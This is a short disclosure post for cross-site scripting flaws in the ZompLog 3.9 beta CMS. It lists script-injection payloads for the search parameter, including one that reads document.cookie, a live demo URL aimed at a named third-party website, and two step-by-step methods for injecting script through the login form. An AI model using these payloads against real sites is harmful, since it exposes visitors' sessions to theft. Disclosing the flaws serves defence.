Zomplog version 3.9 suffers from a cross site scripting vulnerability.
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# Author: swappie [aka] faithlove
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# Title: ZompLog 3.9 beta
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# CMS Link: http://www.zomp.nl/user-content/downloads/zomplog/zomplog3.9-beta.zip
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# Vendor: http://www.zomp.nl/
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# Dork: I'm sure you can figure this out alone, right? #
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http://www.site.com/index.php?search=>"><script>alert(1234567890)</script>
http://www.site.com/index.php?search=%00'"><script>alert(1234567890)</script>
http://www.site.com/index.php?search=>"><script>alert(document.cookie)</script>
Live Demo:
http://www.irishesseling.nl/index.php?search=>"><script>alert(1234567890)</script>
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*) Another Vulnerability regards the www.site.com/login.php
Method 1.
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We can edit the html source code generated by the login.php and
edit the following line:
<td colspan="2"><input type="text" name="login" value="" maxlength="15" id="log" /></td>
[===] MAKE IT LOOK LIKE THIS:
<td colspan="2"><input type="text" name="login" value=">"><script>alert("XSS Vuln")</script>" maxlength="15" id="log" /></td>
Method 2.
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Step 1.
Write in Login section: >">
Step 2.
(Hit Enter) or click the Login Button.
you'll see in Login something looking like this: >\
Step 3.
Delete the ">\" part and insert the following code in it: <script>alert("XSS Vuln")</script>
Step 4.
(Hit Enter) or click the Login Button.
Result: You should see a small window with the "XSS Vuln" text in it.
[!!!] This "login.php part" worked just with a fresh install of the CMS as i have
installed it locally.
Cheers,
swappie [aka] faithlove